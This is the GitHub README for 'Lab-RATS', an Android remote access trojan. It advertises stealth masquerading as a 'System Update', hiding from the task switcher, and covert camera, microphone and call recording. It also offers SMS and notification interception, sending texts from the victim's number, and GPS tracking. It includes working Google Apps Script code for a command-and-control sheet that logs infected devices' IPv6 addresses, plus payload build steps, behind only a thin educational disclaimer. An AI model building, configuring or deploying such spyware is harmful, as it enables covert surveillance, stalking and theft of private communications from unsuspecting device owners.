Skip to content

K4N3CO-LABS/Lab-RATS

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

72 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

Screenshot-2026-06-28-at-8-21-29-AM.png

πŸ€ Lab-RATS: Advanced Android Remote Administration Tool (v1.3.2)

Lab-RATS is a powerful and lightweight Android Remote Administration Tool (RAT) developed by K4N3CO.LABS. This tool allows for remote monitoring and management of Android devices through a sleek, web-based interface designed for speed and reliability. Built for the modern era, it fully supports the latest 2026 Android software releases (OneUI 8.5, SDK 36).


πŸ›‘οΈ Core Features & Security

  • πŸ“¦ Automated APK Generation: Instantly build both signed.apk (for production) and unsigned.apk.
  • πŸ†” Advanced Identity Control: Fully customize App Name, Package ID, and Minimum SDK.
  • πŸ” C2 Security Layer: The web dashboard is protected by a secure login wall (Default: admin1337). The password can be updated directly from the Terminal home page for enhanced security.
  • πŸ•΅οΈ Stealth-First Design:
    • Launcher Stealth: Remotely replace the app icon with a generic "System Update" gear using an Activity Alias (Masquerade Mode) to bypass OS security alerts.
    • Dial-Pad Recovery: If hidden, dial *#1337# on the phone's keypad to re-enable the icon and launch the interface.
    • Recent Apps Exclusion: The app is completely invisible in the Android task switcher (recent apps list).
    • Dynamic Masquerading: Randomly generates Version Names and Version Codes to blend in as system updates.
  • 🎨 Smart Branding Engine:
    • Auto-Density Scaling: Resizes logos automatically for all Android screen densities.
    • Transparency Fixer: Removes white backgrounds from logo assets automatically.
    • Active Tab Glow: The web interface features a neon glow on active tabs for easier navigation.

πŸš€ The Fun Stuff (Remote Capabilities)

  • πŸ›°οΈ Precision GPS Tracking: One-click uplink to open the target's exact real-time location in Google Maps.
  • πŸ“± Remote Screen Projection (Gold Standard): Stream the device's screen in real-time directly to your web browser with a single click. Built with a specialized Android 16 compatibility layer for flawless performance on the latest hardware.
  • ⚑ Intel Stream (Notification Sniffer): Intercept every notification that hits the device (WhatsApp, Telegram, SMS, System) and view them in a live chronological feed.
  • πŸ–ΌοΈ MMS Terminal (Game Changer!):
    • Browse & Extract: Download and view ANY Multimedia Message (MMS) including Images and Videos stored on the device.
    • Remote Dispatch: Send MMS/Picture Messages directly from the target phone with a built-in file browser to pick media from your PC.
  • πŸ’¬ SMS Command Center:
    • Full Interception: Browse and copy every sent/received text message.
    • Remote Texting: Send SMS from the target's number to any destination worldwide.
  • πŸ“Έ Optics & Surveillance:
    • Live Camera Streaming: View high-speed video feeds from both front and back cameras.
    • πŸŒ™ Night Vision Mode: Sensor-boosted low-light mode for visibility in near-total darkness.
    • Background Recording: Stealthily record high-quality video without any user-facing activity.
    • Instant Capture: Take high-resolution photos remotely.
  • πŸŽ™οΈ Acoustics & Interception:
    • Ambient Monitoring: Live microphone recording for high-fidelity audio surveillance.
    • Call Recording: Automatically records both incoming and outgoing phone calls.
  • πŸ“‚ Advanced Data Uplink:
    • Integrated File Manager: Navigate, download, and manage files across internal and external storage.
    • πŸ“ Direct File Editor: Live-edit text, JSON, and log files directly on the device from your browser.
    • Standardized Navigation: Every sub-page features a "Back to Terminal" node for rapid command switching.
  • πŸ“Š Telemetry & Reporting:
    • Full System Extraction: Detailed hardware, network, and battery analytics.
    • Contact & Call Logs: Instant extraction of the target's full contact list and communication history.
    • C2 Auto-Reporting: Discrete reporting of device IP and status to a centralized Google Sheet.

πŸ“Έ Screenshots

--- > APK Builder Interface < ---
APK-builder-pic

--- > Android App (C2 Interface) on Target Device < ---
Android-App-Screen

--- > Remote Web Control Panel (PC Interface) < ---
Lab-RATS-HOME Lab-RATS-Hardware Lab-RATS-Storage Lab-RATS-Camera-Menu Lab-RATS-Screenshare Lab-RATS-Camera-pic Lab-RATS-GPS Lab-RATS-Intel Lab-RATS-Call-logs Lab-RATS-SMS Lab-RATS-MMS Lab-RATS-Audio Lab-RATS-Contacts


🧠 Direct IPv6 Access (The "Backdoor" Protocol)

During security research, a critical behavior in modern Android networking was discovered: devices on mobile data (and modern WiFi) are assigned Public IPv6 Addresses.

Unlike IPv4β€”which is heavily restricted by NAT and requires complex port forwardingβ€”IPv6 addresses are directly routeable on the public internet.

How Lab-RATS Exploits This:

  1. Distributed Server: The app initializes a lightweight HTTP server on the Android device (Port 8080).
  2. Zero Configuration: Because the device uses Public IPv6, you can access the terminal directly from anywhere in the world without router setup, firewalls, or tunnels (Ngrok/Pinggy).
  3. Dynamic IP Solution: Mobile networks rotate IPs frequently. Lab-RATS solves this by using a Google Sheet as a "C2 Phonebook."
  4. Stealth Uplink: The app silently detects its current IPv6 and posts the live link to your sheet. You simply open the sheet and click the latest link to regain control.

Effectively, this turns every infected device into a public web server, tracked by a private C2 phonebook.


πŸ› οΈ Getting Started

1. Requirements

  • Java 11 or 21 installed on your workstation.
  • A target Android device.
  • A Google Sheet Webhook URL for IP tracking.

2. Building the Payload

  1. Extract the repository zip.
  2. Navigate to cd /Lab-RATS/app-builder/.
  3. Execute the builder:
    • Windows: build.bat
    • Linux/Mac: chmod +x build.sh && ./build.sh
  4. Select Option 1 and provide your configuration:
    • App Name: (Default: LAB-RATS)
    • Google Sheet URL: Your Apps Script URL (instructions below).
  5. Retrieve your signed.apk from the output/ directory.

πŸ“Š Google Sheet C2 Setup

  1. Create a new Google Sheet.
  2. Go to Extensions β†’ Apps Script.
  3. Replace the default code with this snippet:
// Lab-RATS C2 Tracking Script
function doPost(e) {
  try {
    var sheet = SpreadsheetApp.getActiveSpreadsheet().getActiveSheet();
    var data = JSON.parse(e.postData.contents);
    sheet.appendRow([new Date(), data.device, data.network, data.ip, data.port, data.link]);
    return ContentService.createTextOutput("UPLINK_SUCCESS").setMimeType(ContentService.MimeType.TEXT);
  } catch (err) {
    return ContentService.createTextOutput("UPLINK_ERROR").setMimeType(ContentService.MimeType.TEXT);
  }
}

// Run once to initialize headers
function setupSheet() {
  var sheet = SpreadsheetApp.getActiveSpreadsheet().getActiveSheet();
  sheet.appendRow(["Timestamp", "Device", "Network", "IP Address", "Port", "Control Link"]);
  sheet.getRange("A1:F1").setFontWeight("bold").setBackground("#050505").setFontColor("#00f2ff");
}
  1. Deploy β†’ Web App β†’ Execute as Me β†’ Access Anyone.
  2. Paste the generated URL into the APK Builder when prompted.

--- > Example Google Sheet - Running & Properly Configured < ---
Lab-RATS-Googlesheet


⭐ Support the Development

If you find Lab-RATS useful for your security research, please Star ⭐ the projectβ€”it drives further development!

Contributions: Bug reports, feature requests, and pull requests are always welcome.

Donations (Optional):

BTC:

bc1q6lmkuju3kf7f8624fwt5qs7k5mf63mekgcnzf4

⚠️ Disclaimer

This tool is strictly for educational and authorized security testing purposes. The developers assume NO responsibility for any misuse or damage caused by this software. Use it responsibly.


Β© 2026 K4N3CO.LABS

About

Developed by K4N3CO.LABS, Lab-RATS is a powerful yet lightweight Android Remote Administration Tool (RAT). It enables remote monitoring and management through a sleek web interface and supports the newest modern Android releases SDK 36. (OneUI 8.5)

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors